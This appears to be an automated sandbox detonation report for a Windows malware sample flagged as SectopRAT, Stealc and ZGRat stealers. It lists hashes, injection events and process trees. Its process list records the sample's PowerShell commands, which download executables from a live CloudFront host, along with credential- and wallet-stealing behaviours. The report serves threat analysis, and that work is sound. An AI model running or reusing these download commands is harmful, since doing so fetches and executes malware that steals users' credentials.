SHA512 2c0619c8236b8a5793f277d20a1420dfd1ef6cfa07922398f76598452b90605b99de927c1d1f50583992540af1a03cedacec2ae6938740308531e0734266c870

memory/1632-486-0x0000000000400000-0x000000000083A000-memory.dmp

memory/1532-487-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1532-489-0x0000000000400000-0x00000000008AD000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2800-504-0x0000000000F50000-0x0000000004848000-memory.dmp

memory/1632-514-0x0000000000400000-0x000000000083A000-memory.dmp

memory/2800-515-0x000000001ECE0000-0x000000001EDF0000-memory.dmp

memory/2800-516-0x0000000000470000-0x0000000000480000-memory.dmp

memory/2800-517-0x0000000000D40000-0x0000000000D4C000-memory.dmp

memory/2800-518-0x0000000000A50000-0x0000000000A64000-memory.dmp

memory/2800-519-0x000000001E5D0000-0x000000001E5F4000-memory.dmp

memory/2800-520-0x0000000000F40000-0x0000000000F4A000-memory.dmp

memory/2800-521-0x000000001E600000-0x000000001E62A000-memory.dmp

memory/2800-522-0x000000001F1D0000-0x000000001F282000-memory.dmp

memory/2800-523-0x000000001F280000-0x000000001F2FA000-memory.dmp

memory/2800-524-0x0000000000EB0000-0x0000000000F12000-memory.dmp

memory/2800-525-0x0000000000A20000-0x0000000000A2A000-memory.dmp

memory/328-526-0x00000000745E0000-0x0000000074754000-memory.dmp

memory/2800-530-0x000000001F850000-0x000000001FB50000-memory.dmp

memory/2800-532-0x0000000000A40000-0x0000000000A4A000-memory.dmp

memory/2800-533-0x0000000000D30000-0x0000000000D3A000-memory.dmp

memory/2800-534-0x0000000000F10000-0x0000000000F32000-memory.dmp

memory/2800-537-0x0000000000F30000-0x0000000000F3C000-memory.dmp

memory/2492-541-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2492-540-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2492-539-0x00000000730B0000-0x0000000074112000-memory.dmp

memory/2492-545-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2800-546-0x0000000000A40000-0x0000000000A4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp5571.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\2b7f7c33bd734341bf343695fe849958.tmp

MD5 c46ed39cc1761b3f1db2ef34cbdaef01
SHA1 89dadbab3f1b4b5b1529e78371df7e69849312d1
SHA256 3037b509ee7ed08583de8526233c9cfd67ba102b1a8e96fc84f454b67a3d8cb1
SHA512 82417ff76c1ff25a318ca60004eea216b8248ab8888f01b013b19851cf707539cec33565794b733344b8a6d057c9d6364991d603e11893f27c6f35ce93ed21c5

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win10v2004-20240226-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\i1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4452 set thread context of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 set thread context of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u224.3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.0.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4888 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 3460 wrote to memory of 4556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3460 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 3460 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.0.exe
PID 2668 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe
PID 3460 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4452 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.3.exe
PID 3580 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\u224.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3400 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nso1C7D.tmp\lood.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u224.0.exe

"C:\Users\Admin\AppData\Local\Temp\u224.0.exe"

C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\u224.3.exe

"C:\Users\Admin\AppData\Local\Temp\u224.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2668 -ip 2668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4256 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4260 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:3

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4448 -ip 4448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 2000

Network


Files

C:\Users\Admin\AppData\Local\Temp\nso1C7D.tmp\INetC.dll

C:\Users\Admin\AppData\Local\Temp\nso1C7D.tmp\lood.bat

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1af2f5k.3bg.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\i1.exe

C:\Users\Admin\AppData\Local\Temp\u224.0.exe

C:\Users\Admin\AppData\Local\Temp\u224.1.zip

C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe

C:\Users\Admin\AppData\Local\Temp\u224.2\relay.dll

C:\Users\Admin\AppData\Local\Temp\u224.2\whale.dbf

C:\Users\Admin\AppData\Local\Temp\u224.2\bunch.dat

C:\Users\Admin\AppData\Local\Temp\u224.2\UIxMarketPlugin.dll

C:\Users\Admin\AppData\Local\Temp\u224.3.exe

C:\Users\Admin\AppData\Local\Temp\3e193774

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

C:\ProgramData\nss3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\Are.docx

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\988345fa-2e28-4dd0-8895-aca43616f250.tmp

C:\Users\Admin\AppData\Local\Temp\tmp1024.tmp

C:\Users\Admin\AppData\Local\Temp\tmp1075.tmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win7-20240220-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1756 wrote to memory of 4504 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4504 -ip 4504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network


Files

N/A